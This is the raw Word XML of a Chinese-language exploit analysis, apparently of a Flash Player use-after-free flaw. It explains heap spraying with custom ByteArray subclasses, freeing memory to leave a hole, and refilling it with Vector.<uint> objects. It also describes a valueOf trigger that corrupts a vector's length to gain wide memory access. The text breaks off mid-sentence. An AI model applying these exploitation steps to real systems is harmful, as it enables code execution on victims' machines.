        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00000F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xploit程序通过如下代码进行HeapSpray：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000F6A" w:rsidRDefault="008D79C1" w:rsidP="00531A3A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4711F0AB" wp14:editId="6B75E2E3">
            <wp:extent cx="5428571" cy="211428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15" w:rsidRDefault="006540F4" w:rsidP="004074F9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pray需要申请/释放大量内存，为了防止垃圾回收导致的内存布局的不可预测，ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序使用了全局静态成员变量_gc来保存申请的内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56BE7" w:rsidRDefault="000B5B05" w:rsidP="00E56BE7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>常规的Flash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Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般是通过Vector或者ByteArray来实现，这里是通过自定义的MyClass2类的来实现，MyClass2继承MyClass1，MyClass1则继承了ByteArray。注意到</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00B679A5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>899</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81303">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量，继承的MyClass1则包含o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1~o4 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个Object类型成员，因此MyClass2一共占用：</w:t>
      </w:r>
      <w:r w:rsidR="00441397">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00927B3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MyClass</w:t>
      </w:r>
      <w:r w:rsidR="007E4535">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自身的结构</w:t>
      </w:r>
      <w:r w:rsidR="00441397">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x</w:t>
      </w:r>
      <w:r w:rsidR="00441397">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85851">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> +[4个Object:4*4]+[900个uint:900*4]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x</w:t>
      </w:r>
      <w:r w:rsidR="006A14F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>E98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，最后对齐到0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节的内存块。同时申请的ByteArray长度为0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fa0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也对齐到0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，从而和MyClass2内存对齐。</w:t>
      </w:r>
      <w:r w:rsidR="00E56BE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HeapSpray完后内存的</w:t>
      </w:r>
      <w:r w:rsidR="007C68CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>局部</w:t>
      </w:r>
      <w:r w:rsidR="00E56BE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>布局如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56BE7" w:rsidRDefault="00A55EF1" w:rsidP="00A55EF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D1709B1" wp14:editId="559A2331">
            <wp:extent cx="6645910" cy="4258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7" w:rsidRDefault="0047537A" w:rsidP="0047537A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注意到MyClass2的构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047537A" w:rsidRDefault="00B266A2" w:rsidP="0047537A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237E75F0" wp14:editId="36C05613">
            <wp:extent cx="4542857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15" w:rsidRDefault="008F5626" w:rsidP="008F5626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1</w:t>
      </w:r>
      <w:r w:rsidR="00A14686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用来存放MyClass2</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例对象地址的Atom值，a</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B0B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0~a63</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用来定位能够被利用的</w:t>
      </w:r>
      <w:r w:rsidR="008B241E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass2。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96615" w:rsidRPr="000B5B05" w:rsidRDefault="00DB0863" w:rsidP="00C96615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C96615">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00C96615" w:rsidRPr="003A18CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002966D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96615" w:rsidRDefault="00DE3675" w:rsidP="00C96615">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HeapSpray完后内存布局为：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843B56" w:rsidTr="00302660">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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ByteArray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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ByteArray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00843B56" w:rsidRDefault="00843B56" w:rsidP="00843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</w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE3675" w:rsidRDefault="00D71A28" w:rsidP="00C96615">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过漏洞成因分析可知，触发漏洞后我们可以控制一个指向ByteArray</w:t>
      </w:r>
      <w:r w:rsidR="008936A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00294C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>悬挂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指针，因此需要释放ByteArray现在的内存空间，</w:t>
      </w:r>
      <w:r w:rsidR="007571F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>形成空洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并用</w:t>
      </w:r>
      <w:r w:rsidR="00DB3301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相同内存大小的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;来占位。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71A28" w:rsidTr="00302660">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="00D71A28" w:rsidP="001F3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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="00D71A28" w:rsidP="001F3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Vector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.&lt;uint&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="00D71A28" w:rsidP="001F3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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="00D71A28" w:rsidP="001F3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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="0066386D" w:rsidP="001F3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Vector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.&lt;uint&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1743" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D71A28" w:rsidRDefault="00D71A28" w:rsidP="001F3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MyClass2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D71A28" w:rsidRDefault="003E647D" w:rsidP="00C96615">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序在</w:t>
      </w:r>
      <w:r w:rsidRPr="003E647D">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass.valueOf()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法中进行的空洞</w:t>
      </w:r>
      <w:r w:rsidR="00114E32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>及占位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E647D" w:rsidRDefault="008127C6" w:rsidP="00C9661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20DBD2" wp14:editId="0E7E90B6">
            <wp:extent cx="3752381" cy="274285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48" w:rsidRDefault="004B1348" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先同Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pray一样将_va用_gc保存防止GC，接着通过</w:t>
      </w:r>
      <w:r w:rsidR="000C369B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_ba.length来释放现在的_ba内存空间，最后申请了5个</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;(0x3f0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占位</w:t>
      </w:r>
      <w:r w:rsidR="00FB0777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（8+</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x3f0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>×4=0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FC8</w:t>
      </w:r>
      <w:r w:rsidR="0097076E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对齐到0x</w:t>
      </w:r>
      <w:r w:rsidR="0097076E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001909E0" w:rsidRDefault="001909E0" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE7CCCB" wp14:editId="39A107FB">
            <wp:extent cx="5752381" cy="4933333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D" w:rsidRPr="000B5B05" w:rsidRDefault="00535B9F" w:rsidP="000B4F9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="000B4F9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="000B4F9D" w:rsidRPr="003A18CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidR="006C42FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和定位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4F9D" w:rsidRDefault="00A22DDA" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>触发漏洞的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A22DDA" w:rsidRDefault="004225AC" w:rsidP="004B134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B5FB94F" wp14:editId="4C96262B">
            <wp:extent cx="4514286" cy="16857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AF" w:rsidRDefault="00600AAF" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>考虑到低地址空间内存申请的碎片化导致的不连续性，exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>loit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序从高地址空间开始尝试触发漏洞，</w:t>
      </w:r>
      <w:r w:rsidRPr="00600AAF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_ba = a[i]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是将之前申请的ByteArray赋值给_ba，</w:t>
      </w:r>
      <w:r w:rsidR="00890221">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_ba[3] = new MyClass()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>触发漏洞，导致</w:t>
      </w:r>
      <w:r w:rsidRPr="003E647D">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass.valueOf()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的返回值0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并没有赋值给新</w:t>
      </w:r>
      <w:r w:rsidR="003D3C81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>申请内存空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00600AAF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_ba[3]</w:t>
      </w:r>
      <w:r w:rsidR="003D3C81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而是赋值给了悬挂指针指向地址的第四个字节</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也就是占位</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F" w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;(0x3f0)</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的第四个字节，从而将</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F" w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;(0x3f0)</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的长度篡改为0x</w:t>
      </w:r>
      <w:r w:rsidR="00AA684F">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>400003f0</w:t>
      </w:r>
      <w:r w:rsidR="003D3C81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A4952" w:rsidRDefault="00B600F5" w:rsidP="00B47759">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA711D2" wp14:editId="4A829CF6">
            <wp:extent cx="5561905" cy="495238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32" w:rsidRDefault="00897FCD" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得了一个长度为0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>400003f0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
